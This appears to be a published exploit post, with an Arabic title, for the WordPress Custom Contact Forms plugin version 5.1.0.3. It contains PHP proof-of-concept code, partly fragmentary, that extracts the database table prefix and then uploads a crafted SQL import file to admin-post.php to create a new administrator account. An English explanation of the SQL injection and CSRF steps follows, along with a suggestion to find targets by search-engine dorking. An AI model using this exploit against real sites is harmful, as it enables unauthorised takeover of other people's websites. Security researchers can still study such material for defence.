استغلال ثغرة ووردبريس

============================================================================================================================================= | # Title : WordPress Custom contact forms Plugin v 5.1.0.3 CSRF / SQL Injection | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://wordpress.org/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: This code attempts to exploit a vulnerability in WordPress to add a new admin user. (linked: https://packetstorm.news/files/id/180885/ Linked CVE numbers: ), [+] save code as poc.php. [+] Line 70 set you user & pass [+] USage : http://127.0.0.1/poc.php [+] PayLoad : '1' ]); $opts = ['http' => ['method' => 'POST', 'content' => $postdata]]; $context = stream_context_create($opts); $response = file_get_contents($export_url, false, $context); if (!$response || !preg_match('/insert into `(.+_)customcontactforms_fields`/i', $response, $matches)) { return null; } return $matches[1]; } $table_prefix = getTablePrefix($target); if (!$table_prefix) { echo "

تعذر الحصول على بادئة الجدول!

"; exit; } $sql = "INSERT INTO {$table_prefix}users (user_login, user_pass) VALUES ('$username', MD5('$password')); INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((SELECT id FROM {$table_prefix}users WHERE user_login='$username'), '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}');"; $boundary = md5(time()); $data = "--$boundary\r\n"; $data .= "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.sql\"\r\n"; $data .= "Content-Type: text/plain\r\n\r\n"; $data .= "$sql\r\n"; $data .= "--$boundary\r\n"; $data .= "Content-Disposition: form-data; name=\"ccf_merge_import\"\r\n\r\n1\r\n"; $data .= "--$boundary--\r\n"; $opts = ['http' => ['method' => 'POST', 'header' => "Content-Type: multipart/form-data; boundary=$boundary", 'content' => $data]]; $context = stream_context_create($opts); $result = file_get_contents("$target/wp-admin/admin-post.php", false, $context); if ($result) { echo "

تم إنشاء مستخدم جديد بنجاح!
indoushka: $username
packet2025strom: $password

"; } else { echo "

فشل في تنفيذ الهجوم!

"; } } ?> استغلال ثغرة ووردبريس

استغلال ثغرة ووردبريس - custom-contact-forms

Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| =================================================================================================== Explanation: 1. SQL Injection in the Code: The key part that exploits SQL Injection is this line: $sql = "INSERT INTO {$table_prefix}users (user_login, user_pass) VALUES ('$username', MD5('$password')); INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((SELECT id FROM {$table_prefix}users WHERE user_login='$username'), '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}');"; SQL Injection is being leveraged here in two key ways: Dynamic Table Prefix: The $table_prefix variable is dynamically set from the vulnerable WordPress site by exploiting the vulnerability in the "Custom Contact Forms" plugin. By using this dynamic table prefix, the attacker injects the actual table names into the SQL query. This is crucial because WordPress installations can use different table prefixes (such as wp_, wp123_, etc.), so exploiting this prefix injection allows the attacker to target any WordPress installation, regardless of its configuration. User and Meta Insertions: The attacker inserts values for the user_login and user_pass columns in the users table and inserts the capabilities metadata for the user into the usermeta table. The attacker injects arbitrary values directly into the SQL query, including the user_login, user_pass, and meta_value, allowing them to create a user with administrator privileges. Specifically, this line: INSERT INTO {$table_prefix}users (user_login, user_pass) VALUES ('$username', MD5('$password')); The attacker can control the $username and $password values by generating them randomly, ensuring that a new admin user is created. And this line: INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((SELECT id FROM {$table_prefix}users WHERE user_login='$username'), '{$table_prefix}capabilities', 'a:1:{s:13:\"administrator\";b:1;}'); 2. CSRF (Cross-Site Request Forgery): The CSRF comes into play because the attacker is exploiting the WordPress site's functionality by sending a POST request to the site without the target user's knowledge or consent. The attacker crafts a malicious request (with the SQL injection and user creation data) and then sends it to the WordPress site via the admin-post.php endpoint. This request is sent through an HTML form (the form in the provided code), and the attacker only needs the target website's URL. If a logged-in WordPress user accesses this malicious page, it triggers the creation of the new user with admin privileges. The attack uses file_get_contents() to send a POST request to the wp-admin/admin-post.php endpoint. The attacker is bypassing any CSRF protections (like WordPress's nonces) that could otherwise prevent this attack.